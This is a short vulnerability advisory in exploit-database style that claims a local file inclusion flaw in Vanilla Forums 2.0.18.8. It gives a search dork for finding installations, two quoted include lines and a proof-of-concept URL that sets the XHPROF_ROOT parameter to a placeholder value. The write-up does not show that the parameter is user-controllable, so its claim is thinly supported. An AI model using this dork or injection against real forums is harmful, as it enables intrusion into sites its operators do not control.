============================================================================
| # Title     : Vanilla Version 2.0.18.8 LFI Vulnerability                 |
| # Author    : indoushka                                                  |
| # email     : indoushka4ever@gmail.com                                   |
| # Tested on : windows 10 FranASSais V.(Pro)                                |
| # Version   : 2.0.18.8                                                   |
| # Vendor    : https://vanillaforums.com/en/software/                     |  
| # Dork      : powered by vanilla                                         |
============================================================================

poc :

LFI :


vani20188\index.php

line 70;71		

   include_once("{$XHPROF_ROOT}/xhprof_lib/utils/xhprof_lib.php");
   include_once("{$XHPROF_ROOT}/xhprof_lib/utils/xhprof_runs.php");


http://127.0.0.1/vani20188/index.php?XHPROF_ROOT= 3v!l

Greetz :----------------------------------------------------------------------------------------
                                                                                               |
jericho * Larry W. Cashdollar * shadow0075 * djroot.dz *Gjoko 'LiquidWorm' Krstic              |
                                                                                               |
================================================================================================